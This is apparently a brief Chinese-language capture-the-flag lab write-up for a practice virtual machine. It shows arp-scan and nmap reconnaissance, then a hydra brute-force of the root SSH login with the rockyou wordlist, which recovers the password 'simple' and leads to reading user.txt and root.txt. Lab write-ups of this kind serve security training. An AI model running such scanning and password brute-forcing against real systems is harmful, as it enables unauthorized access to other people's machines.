信息搜集
主机扫描
arp-scan -l端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-22 05:51 EDT
Nmap scan report for 192.168.254.161
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
80/tcp open http nginx
MAC Address: 08:00:27:4A:48:E0 (Oracle VirtualBox virtual NIC)
目录扫描
dirsearch和gobuster都没有扫描出结果,只有一个index.html
拿取shell+提权
┌──(root㉿kali)-[~]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.254.161
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 06:03:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.254.161:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 192.168.254.161 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-22 06:06:15
直接ssh登录,拿到user.txt和root.txt
知识点
- 靶场非常基础,因为没有任何路径,所以只能用root用户了,爆破ssh,得出密码